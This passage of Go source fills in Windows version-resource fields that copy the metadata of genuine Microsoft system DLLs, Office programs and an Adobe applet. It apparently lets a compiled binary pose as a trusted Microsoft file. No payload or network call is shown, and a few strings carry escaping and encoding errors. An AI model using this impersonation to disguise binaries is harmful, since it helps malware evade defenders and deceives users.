236 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
237 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmdext.dll"
238 | vi.FixedFileInfo.ProductVersion.Patch = 18362
239 | vi.FixedFileInfo.ProductVersion.Major = 10
240 | vi.FixedFileInfo.ProductVersion.Minor = 0
241 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
242 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
243 | vi.FixedFileInfo.FileVersion.Major = 1
244 | vi.FixedFileInfo.FileVersion.Minor = 0
245 | vi.FixedFileInfo.FileVersion.Patch = 18362
246 | vi.FixedFileInfo.FileVersion.Build = 1
247 | vi.StringFileInfo.InternalName = "CmdExt.DLL"
248 | }
249 | if name == "httpapi" {
250 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
251 | vi.StringFileInfo.InternalName = "httpapi.dll.mui"
252 | vi.StringFileInfo.FileDescription = "HTTP Protocol Stack API"
253 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
254 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
255 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\httpapi.dll"
256 | vi.FixedFileInfo.ProductVersion.Patch = 18362
257 | vi.FixedFileInfo.ProductVersion.Major = 10
258 | vi.FixedFileInfo.ProductVersion.Minor = 0
259 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
260 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
261 | vi.FixedFileInfo.FileVersion.Major = 1
262 | vi.FixedFileInfo.FileVersion.Minor = 0
263 | vi.FixedFileInfo.FileVersion.Patch = 18362
264 | vi.FixedFileInfo.FileVersion.Build = 1
265 | vi.StringFileInfo.InternalName = "httpapi.dll.mui"
266 | }
267 | if name == "logoncli" {
268 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
269 | vi.StringFileInfo.InternalName = "LOGONCLI.DLL"
270 | vi.StringFileInfo.FileDescription = "Net Logon Client DLL"
271 | vi.StringFileInfo.FileVersion = "10.0.18362.1237 (WinBuild.160101.0800)"
272 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
273 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\logoncli.dll"
274 | vi.FixedFileInfo.ProductVersion.Patch = 18362
275 | vi.FixedFileInfo.ProductVersion.Major = 10
276 | vi.FixedFileInfo.ProductVersion.Minor = 0
277 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
278 | vi.StringFileInfo.ProductVersion = "10.0.18362.1237"
279 | vi.FixedFileInfo.FileVersion.Major = 1
280 | vi.FixedFileInfo.FileVersion.Minor = 0
281 | vi.FixedFileInfo.FileVersion.Patch = 18362
282 | vi.FixedFileInfo.FileVersion.Build = 1237
283 | vi.StringFileInfo.InternalName = "LOGONCLI.DLL"
284 | }
285 | if name == "netlogon" {
286 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
287 | vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI"
288 | vi.StringFileInfo.FileDescription = "Net Logon Services DLL"
289 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
290 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
291 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\netlogon.dll"
292 | vi.FixedFileInfo.ProductVersion.Patch = 18362
293 | vi.FixedFileInfo.ProductVersion.Major = 10
294 | vi.FixedFileInfo.ProductVersion.Minor = 0
295 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
296 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
297 | vi.FixedFileInfo.FileVersion.Major = 1
298 | vi.FixedFileInfo.FileVersion.Minor = 0
299 | vi.FixedFileInfo.FileVersion.Patch = 18362
300 | vi.FixedFileInfo.FileVersion.Build = 1
301 | vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI"
302 | }
303 | if name == "tcpmon" {
304 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
305 | vi.StringFileInfo.InternalName = "tcpmon.dll.mui"
306 | vi.StringFileInfo.FileDescription = "Standard TCP/IP Port Monitor DLL"
307 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
308 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
309 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\tcpmon.dll"
310 | vi.FixedFileInfo.ProductVersion.Patch = 18362
311 | vi.FixedFileInfo.ProductVersion.Major = 10
312 | vi.FixedFileInfo.ProductVersion.Minor = 0
313 | vi.StringFileInfo.ProductName = "Microsoft Corporation"
314 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
315 | vi.FixedFileInfo.FileVersion.Major = 1
316 | vi.FixedFileInfo.FileVersion.Minor = 0
317 | vi.FixedFileInfo.FileVersion.Patch = 18362
318 | vi.FixedFileInfo.FileVersion.Build = 1
319 | vi.StringFileInfo.InternalName = "tcpmon.dll.mui"
320 | }
321 | if name == "OneNote" {
322 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
323 | vi.StringFileInfo.InternalName = "OneNote"
324 | vi.StringFileInfo.FileDescription = "Microsoft OneNote"
325 | vi.StringFileInfo.FileVersion = "16.0.13901.20462"
326 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
327 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\ONENOTE.EXE"
328 | vi.FixedFileInfo.ProductVersion.Patch = 13901
329 | vi.FixedFileInfo.ProductVersion.Major = 16
330 | vi.FixedFileInfo.ProductVersion.Minor = 0
331 | vi.StringFileInfo.ProductName = "Microsoft Office"
332 | vi.StringFileInfo.ProductVersion = "16.0.13901.20462"
333 | vi.FixedFileInfo.FileVersion.Major = 16
334 | vi.FixedFileInfo.FileVersion.Minor = 0
335 | vi.FixedFileInfo.FileVersion.Patch = 13901
336 | vi.FixedFileInfo.FileVersion.Build = 20462
337 | vi.StringFileInfo.InternalName = "OneNote"
338 | }
339 |
340 | if name == "Excel" {
341 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
342 | vi.StringFileInfo.InternalName = "Excel"
343 | vi.StringFileInfo.FileDescription = "Microsoft Excel"
344 | vi.StringFileInfo.FileVersion = "16.0.11929.20838"
345 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
346 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
347 | vi.FixedFileInfo.ProductVersion.Patch = 11929
348 | vi.FixedFileInfo.ProductVersion.Major = 16
349 | vi.FixedFileInfo.ProductVersion.Minor = 0
350 | vi.StringFileInfo.ProductName = "Microsoft Office"
351 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
352 | vi.FixedFileInfo.FileVersion.Major = 16
353 | vi.FixedFileInfo.FileVersion.Minor = 0
354 | vi.FixedFileInfo.FileVersion.Patch = 11929
355 | vi.FixedFileInfo.FileVersion.Build = 20838
356 | vi.StringFileInfo.InternalName = "Excel"
357 | }
358 | if name == "Word" {
359 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
360 | vi.StringFileInfo.InternalName = "Word"
361 | vi.StringFileInfo.FileDescription = "Microsoft Word"
362 | vi.StringFileInfo.FileVersion = "16.0.11929.20838"
363 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
364 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WORD.EXE"
365 | vi.FixedFileInfo.ProductVersion.Patch = 11929
366 | vi.FixedFileInfo.ProductVersion.Major = 16
367 | vi.FixedFileInfo.ProductVersion.Minor = 0
368 | vi.StringFileInfo.ProductName = "Microsoft Office"
369 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
370 | vi.FixedFileInfo.FileVersion.Major = 16
371 | vi.FixedFileInfo.FileVersion.Minor = 0
372 | vi.FixedFileInfo.FileVersion.Patch = 11929
373 | vi.FixedFileInfo.FileVersion.Build = 20838
374 | vi.StringFileInfo.InternalName = "Word"
375 | }
376 | if name == "Powerpnt" {
377 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
378 | vi.StringFileInfo.InternalName = "POWERPNT"
379 | vi.StringFileInfo.FileDescription = "Microsoft PowerPoint"
380 | vi.StringFileInfo.FileVersion = "16.0.11929.20838"
381 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
382 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE"
383 | vi.FixedFileInfo.ProductVersion.Patch = 11929
384 | vi.FixedFileInfo.ProductVersion.Major = 16
385 | vi.FixedFileInfo.ProductVersion.Minor = 0
386 | vi.StringFileInfo.ProductName = "Microsoft Office"
387 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
388 | vi.FixedFileInfo.FileVersion.Major = 16
389 | vi.FixedFileInfo.FileVersion.Minor = 0
390 | vi.FixedFileInfo.FileVersion.Patch = 11929
391 | vi.FixedFileInfo.FileVersion.Build = 20838
392 | vi.StringFileInfo.InternalName = "POWERPNT"
393 | }
394 | if name == "Outlook" {
395 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
396 | vi.StringFileInfo.InternalName = "Outlook.exe"
397 | vi.StringFileInfo.FileDescription = "Microsoft Outlook"
398 | vi.StringFileInfo.FileVersion = "16.0.11929.20838"
399 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
400 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"
401 | vi.FixedFileInfo.ProductVersion.Patch = 11929
402 | vi.FixedFileInfo.ProductVersion.Major = 16
403 | vi.FixedFileInfo.ProductVersion.Minor = 0
404 | vi.StringFileInfo.ProductName = "Microsoft Office"
405 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
406 | vi.FixedFileInfo.FileVersion.Major = 16
407 | vi.FixedFileInfo.FileVersion.Minor = 0
408 | vi.FixedFileInfo.FileVersion.Patch = 11929
409 | vi.FixedFileInfo.FileVersion.Build = 20838
410 | vi.StringFileInfo.InternalName = "Outlook"
411 | }
412 | if name == "lync" {
413 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
414 | vi.StringFileInfo.InternalName = "Lync"
415 | vi.StringFileInfo.FileDescription = "Skype for Business"
416 | vi.StringFileInfo.FileVersion = "16.0.11929.20838"
417 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
418 | vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\lync.exe"
419 | vi.FixedFileInfo.ProductVersion.Patch = 11929
420 | vi.FixedFileInfo.ProductVersion.Major = 16
421 | vi.FixedFileInfo.ProductVersion.Minor = 0
422 | vi.StringFileInfo.ProductName = "Microsoft Office"
423 | vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
424 | vi.FixedFileInfo.FileVersion.Major = 16
425 | vi.FixedFileInfo.FileVersion.Minor = 0
426 | vi.FixedFileInfo.FileVersion.Patch = 11929
427 | vi.FixedFileInfo.FileVersion.Build = 20838
428 | vi.StringFileInfo.InternalName = "Lync"
429 | }
430 | if name == "cmd" {
431 | vi.StringFileInfo.InternalName = "cmd"
432 | vi.StringFileInfo.FileDescription = "Windows Command Processor"
433 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
434 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
435 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmd.exe"
436 | vi.FixedFileInfo.ProductVersion.Patch = 1
437 | vi.FixedFileInfo.ProductVersion.Major = 10
438 | vi.FixedFileInfo.ProductVersion.Minor = 0
439 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
440 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
441 | vi.FixedFileInfo.FileVersion.Major = 10
442 | vi.FixedFileInfo.FileVersion.Minor = 0
443 | vi.FixedFileInfo.FileVersion.Patch = 1
444 | vi.FixedFileInfo.FileVersion.Build = 18362
445 | vi.StringFileInfo.InternalName = "cmd.exe"
446 | }
447 | if name == "OneDrive" {
448 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
449 | vi.StringFileInfo.InternalName = "OneDrive.exe"
450 | vi.StringFileInfo.FileDescription = "Microsoft OneDrive"
451 | vi.StringFileInfo.FileVersion = "20.114.0607.0002"
452 | vi.StringFileInfo.LegalCopyright = "©¿½ Microsoft Corporation. All rights reserved."
453 | vi.StringFileInfo.OriginalFilename = "OneDrive.exe"
454 | vi.FixedFileInfo.ProductVersion.Patch = 2
455 | vi.FixedFileInfo.ProductVersion.Major = 20
456 | vi.FixedFileInfo.ProductVersion.Minor = 114
457 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
458 | vi.StringFileInfo.ProductVersion = "20.114.0607.0002"
459 | vi.FixedFileInfo.FileVersion.Major = 20
460 | vi.FixedFileInfo.FileVersion.Minor = 114
461 | vi.FixedFileInfo.FileVersion.Patch = 2
462 | vi.FixedFileInfo.FileVersion.Build = 607
463 | vi.StringFileInfo.InternalName = "OneDrive.exe"
464 | }
465 | if name == "apphelp" {
466 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
467 | vi.StringFileInfo.InternalName = "Apphelp"
468 | vi.StringFileInfo.FileDescription = "Application Compatibility Client Library"
469 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
470 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
471 | vi.StringFileInfo.LegalTrademarks = ""
472 | vi.FixedFileInfo.ProductVersion.Patch = 18362
473 | vi.FixedFileInfo.ProductVersion.Major = 10
474 | vi.FixedFileInfo.ProductVersion.Minor = 0
475 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
476 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
477 | vi.FixedFileInfo.FileVersion.Major = 10
478 | vi.FixedFileInfo.FileVersion.Minor = 0
479 | vi.FixedFileInfo.FileVersion.Patch = 18362
480 | vi.FixedFileInfo.FileVersion.Build = 1
481 | vi.StringFileInfo.OriginalFilename = "Apphelp.dll"
482 | }
483 | if name == "bcryptprimitives" {
484 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
485 | vi.StringFileInfo.InternalName = "bcryptprimitives.dll"
486 | vi.StringFileInfo.FileDescription = "Windows Cryptographic Primitives Library"
487 | vi.StringFileInfo.FileVersion = "10.0.18362.836 (WinBuild.160101.0800)"
488 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
489 | vi.StringFileInfo.LegalTrademarks = ""
490 | vi.FixedFileInfo.ProductVersion.Patch = 18362
491 | vi.FixedFileInfo.ProductVersion.Major = 10
492 | vi.FixedFileInfo.ProductVersion.Minor = 0
493 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
494 | vi.StringFileInfo.ProductVersion = "10.0.18362.836"
495 | vi.FixedFileInfo.FileVersion.Major = 10
496 | vi.FixedFileInfo.FileVersion.Minor = 0
497 | vi.FixedFileInfo.FileVersion.Patch = 18362
498 | vi.FixedFileInfo.FileVersion.Build = 836
499 | vi.StringFileInfo.OriginalFilename = "bcryptprimitives.dll"
500 | }
501 | if name == "cfgmgr32" {
502 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
503 | vi.StringFileInfo.InternalName = "cfgmgr32.dll"
504 | vi.StringFileInfo.FileDescription = "Configuration Manager DLL"
505 | vi.StringFileInfo.FileVersion = "10.0.18362.387 (WinBuild.160101.0800)"
506 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
507 | vi.StringFileInfo.LegalTrademarks = ""
508 | vi.FixedFileInfo.ProductVersion.Patch = 18362
509 | vi.FixedFileInfo.ProductVersion.Major = 10
510 | vi.FixedFileInfo.ProductVersion.Minor = 0
511 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
512 | vi.StringFileInfo.ProductVersion = "10.0.18362.387"
513 | vi.FixedFileInfo.FileVersion.Major = 10
514 | vi.FixedFileInfo.FileVersion.Minor = 0
515 | vi.FixedFileInfo.FileVersion.Patch = 18362
516 | vi.FixedFileInfo.FileVersion.Build = 387
517 | vi.StringFileInfo.OriginalFilename = "cfgmgr32.dll"
518 | }
519 | if name == "combase" {
520 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
521 | vi.StringFileInfo.InternalName = "COMBASE.DLL"
522 | vi.StringFileInfo.FileDescription = "Microsoft COM for Windows"
523 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
524 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
525 | vi.StringFileInfo.LegalTrademarks = ""
526 | vi.FixedFileInfo.ProductVersion.Patch = 18362
527 | vi.FixedFileInfo.ProductVersion.Major = 10
528 | vi.FixedFileInfo.ProductVersion.Minor = 0
529 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
530 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
531 | vi.FixedFileInfo.FileVersion.Major = 10
532 | vi.FixedFileInfo.FileVersion.Minor = 0
533 | vi.FixedFileInfo.FileVersion.Patch = 18362
534 | vi.FixedFileInfo.FileVersion.Build = 1
535 | vi.StringFileInfo.OriginalFilename = "COMBASE.DLL"
536 | }
537 | if name == "cryptsp" {
538 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
539 | vi.StringFileInfo.InternalName = "cryptsp.dll"
540 | vi.StringFileInfo.FileDescription = "Cryptographic Service Provider API"
541 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
542 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
543 | vi.StringFileInfo.LegalTrademarks = ""
544 | vi.FixedFileInfo.ProductVersion.Patch = 18362
545 | vi.FixedFileInfo.ProductVersion.Major = 10
546 | vi.FixedFileInfo.ProductVersion.Minor = 0
547 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
548 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
549 | vi.FixedFileInfo.FileVersion.Major = 10
550 | vi.FixedFileInfo.FileVersion.Minor = 0
551 | vi.FixedFileInfo.FileVersion.Patch = 18362
552 | vi.FixedFileInfo.FileVersion.Build = 1
553 | vi.StringFileInfo.OriginalFilename = "cryptsp.dll"
554 | }
555 | if name == "dnsapi" {
556 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
557 | vi.StringFileInfo.InternalName = "dnsapi"
558 | vi.StringFileInfo.FileDescription = "DNS Client API DLL"
559 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
560 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
561 | vi.StringFileInfo.LegalTrademarks = ""
562 | vi.FixedFileInfo.ProductVersion.Patch = 18362
563 | vi.FixedFileInfo.ProductVersion.Major = 10
564 | vi.FixedFileInfo.ProductVersion.Minor = 0
565 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
566 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
567 | vi.FixedFileInfo.FileVersion.Major = 10
568 | vi.FixedFileInfo.FileVersion.Minor = 0
569 | vi.FixedFileInfo.FileVersion.Patch = 18362
570 | vi.FixedFileInfo.FileVersion.Build = 1
571 | vi.StringFileInfo.OriginalFilename = "dnsapi"
572 | }
573 | if name == "dpapi" {
574 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
575 | vi.StringFileInfo.InternalName = "dpapi.dll"
576 | vi.StringFileInfo.FileDescription = "Data Protection API"
577 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
578 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
579 | vi.StringFileInfo.LegalTrademarks = ""
580 | vi.FixedFileInfo.ProductVersion.Patch = 18362
581 | vi.FixedFileInfo.ProductVersion.Major = 10
582 | vi.FixedFileInfo.ProductVersion.Minor = 0
583 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
584 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
585 | vi.FixedFileInfo.FileVersion.Major = 10
586 | vi.FixedFileInfo.FileVersion.Minor = 0
587 | vi.FixedFileInfo.FileVersion.Patch = 18362
588 | vi.FixedFileInfo.FileVersion.Build = 1
589 | vi.StringFileInfo.OriginalFilename = "dpapi.dll"
590 | }
591 | if name == "sechost" {
592 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
593 | vi.StringFileInfo.InternalName = "sechost.dll"
594 | vi.StringFileInfo.FileDescription = "Host for SCM/SDDL/LSA Lookup APIs"
595 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
596 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
597 | vi.StringFileInfo.LegalTrademarks = ""
598 | vi.FixedFileInfo.ProductVersion.Patch = 18362
599 | vi.FixedFileInfo.ProductVersion.Major = 10
600 | vi.FixedFileInfo.ProductVersion.Minor = 0
601 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
602 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
603 | vi.FixedFileInfo.FileVersion.Major = 10
604 | vi.FixedFileInfo.FileVersion.Minor = 0
605 | vi.FixedFileInfo.FileVersion.Patch = 18362
606 | vi.FixedFileInfo.FileVersion.Build = 1
607 | vi.StringFileInfo.OriginalFilename = "sechost.dll"
608 | }
609 | if name == "schannel" {
610 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
611 | vi.StringFileInfo.InternalName = "schannel.dll"
612 | vi.StringFileInfo.FileDescription = "TLS / SSL Security Provider"
613 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
614 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
615 | vi.StringFileInfo.LegalTrademarks = ""
616 | vi.FixedFileInfo.ProductVersion.Patch = 18362
617 | vi.FixedFileInfo.ProductVersion.Major = 10
618 | vi.FixedFileInfo.ProductVersion.Minor = 0
619 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
620 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
621 | vi.FixedFileInfo.FileVersion.Major = 10
622 | vi.FixedFileInfo.FileVersion.Minor = 0
623 | vi.FixedFileInfo.FileVersion.Patch = 18362
624 | vi.FixedFileInfo.FileVersion.Build = 1
625 | vi.StringFileInfo.OriginalFilename = "schannel.dll"
626 | }
627 | if name == "urlmon" {
628 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
629 | vi.StringFileInfo.InternalName = "UrlMon.dll"
630 | vi.StringFileInfo.FileDescription = "OLE32 Extensions for Win32"
631 | vi.StringFileInfo.FileVersion = "11.00.18362.1 (WinBuild.160101.0800)"
632 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
633 | vi.StringFileInfo.LegalTrademarks = ""
634 | vi.FixedFileInfo.ProductVersion.Patch = 18362
635 | vi.FixedFileInfo.ProductVersion.Major = 11
636 | vi.FixedFileInfo.ProductVersion.Minor = 0
637 | vi.StringFileInfo.ProductName = "Internet Explorer"
638 | vi.StringFileInfo.ProductVersion = "11.00.18362.1"
639 | vi.FixedFileInfo.FileVersion.Major = 10
640 | vi.FixedFileInfo.FileVersion.Minor = 0
641 | vi.FixedFileInfo.FileVersion.Patch = 18362
642 | vi.FixedFileInfo.FileVersion.Build = 1
643 | vi.StringFileInfo.OriginalFilename = "UrlMon.dll"
644 | }
645 | if name == "win32u" {
646 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
647 | vi.StringFileInfo.InternalName = "Win32u"
648 | vi.StringFileInfo.FileDescription = "Win32u"
649 | vi.StringFileInfo.FileVersion = "10.0.18362.900 (WinBuild.160101.0800)"
650 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
651 | vi.StringFileInfo.LegalTrademarks = ""
652 | vi.FixedFileInfo.ProductVersion.Patch = 18362
653 | vi.FixedFileInfo.ProductVersion.Major = 10
654 | vi.FixedFileInfo.ProductVersion.Minor = 0
655 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
656 | vi.StringFileInfo.ProductVersion = "10.0.18362.900"
657 | vi.FixedFileInfo.FileVersion.Major = 10
658 | vi.FixedFileInfo.FileVersion.Minor = 0
659 | vi.FixedFileInfo.FileVersion.Patch = 18362
660 | vi.FixedFileInfo.FileVersion.Build = 1
661 | vi.StringFileInfo.OriginalFilename = "Win32u"
662 | }
663 | if name == "appwizard" {
664 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
665 | vi.StringFileInfo.InternalName = "appwiz.cpl"
666 | vi.StringFileInfo.FileDescription = "Shell Application Manager"
667 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
668 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
669 | vi.StringFileInfo.OriginalFilename = "APPWIZ.CPL.MUI"
670 | vi.FixedFileInfo.ProductVersion.Patch = 18362
671 | vi.FixedFileInfo.ProductVersion.Major = 10
672 | vi.FixedFileInfo.ProductVersion.Minor = 0
673 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
674 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
675 | vi.FixedFileInfo.FileVersion.Major = 10
676 | vi.FixedFileInfo.FileVersion.Minor = 0
677 | vi.FixedFileInfo.FileVersion.Patch = 18362
678 | vi.FixedFileInfo.FileVersion.Build = 1
679 | vi.StringFileInfo.InternalName = "appwiz.cpl"
680 | }
681 | if name == "bthprop" {
682 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
683 | vi.StringFileInfo.InternalName = "bthprops.cpl"
684 | vi.StringFileInfo.FileDescription = "Bluetooth Control Panel Applet"
685 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
686 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
687 | vi.StringFileInfo.OriginalFilename = "bluetooth.cpl.mui"
688 | vi.FixedFileInfo.ProductVersion.Patch = 18362
689 | vi.FixedFileInfo.ProductVersion.Major = 10
690 | vi.FixedFileInfo.ProductVersion.Minor = 0
691 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
692 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
693 | vi.FixedFileInfo.FileVersion.Major = 10
694 | vi.FixedFileInfo.FileVersion.Minor = 0
695 | vi.FixedFileInfo.FileVersion.Patch = 18362
696 | vi.FixedFileInfo.FileVersion.Build = 1
697 | vi.StringFileInfo.InternalName = "bthprops.cpl"
698 | }
699 | if name == "desktop" {
700 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
701 | vi.StringFileInfo.InternalName = "desk.cpl"
702 | vi.StringFileInfo.FileDescription = "Desktop Settings Control Panel"
703 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
704 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
705 | vi.StringFileInfo.OriginalFilename = "DESK.CPL.MUI"
706 | vi.FixedFileInfo.ProductVersion.Patch = 18362
707 | vi.FixedFileInfo.ProductVersion.Major = 10
708 | vi.FixedFileInfo.ProductVersion.Minor = 0
709 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
710 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
711 | vi.FixedFileInfo.FileVersion.Major = 10
712 | vi.FixedFileInfo.FileVersion.Minor = 0
713 | vi.FixedFileInfo.FileVersion.Patch = 18362
714 | vi.FixedFileInfo.FileVersion.Build = 1
715 | vi.StringFileInfo.InternalName = "DESK"
716 |
717 | }
718 | if name == "netfirewall" {
719 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
720 | vi.StringFileInfo.InternalName = "Firewall.cpl"
721 | vi.StringFileInfo.FileDescription = "Windows Defender Firewall Control Panel DLL Launching Stub"
722 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
723 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
724 | vi.StringFileInfo.OriginalFilename = "Firewall.cpl"
725 | vi.FixedFileInfo.ProductVersion.Patch = 18362
726 | vi.FixedFileInfo.ProductVersion.Major = 10
727 | vi.FixedFileInfo.ProductVersion.Minor = 0
728 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
729 | vi.StringFileInfo.ProductVersion = "10.0.18362.1"
730 | vi.FixedFileInfo.FileVersion.Major = 10
731 | vi.FixedFileInfo.FileVersion.Minor = 0
732 | vi.FixedFileInfo.FileVersion.Patch = 18362
733 | vi.FixedFileInfo.FileVersion.Build = 1
734 | vi.StringFileInfo.InternalName = "Firewall.cpl"
735 | }
736 | if name == "FlashPlayer" {
737 | vi.StringFileInfo.CompanyName = "Microsoft Corporation"
738 | vi.StringFileInfo.InternalName = " Adobe Flash Player Control Panel Applet 32.0"
739 | vi.StringFileInfo.FileDescription = " Adobe Flash Player Control Panel Applet"
740 | vi.StringFileInfo.FileVersion = "32.0.0.255"
741 | vi.StringFileInfo.LegalCopyright = " Copyright © 1996-2019 Adobe. All Rights Reserved. Adobe and Flash are either trademarks or registered trademarks in the United States and/or other countries."
742 | vi.StringFileInfo.OriginalFilename = "FlashPlayerCPLApp.cpl"
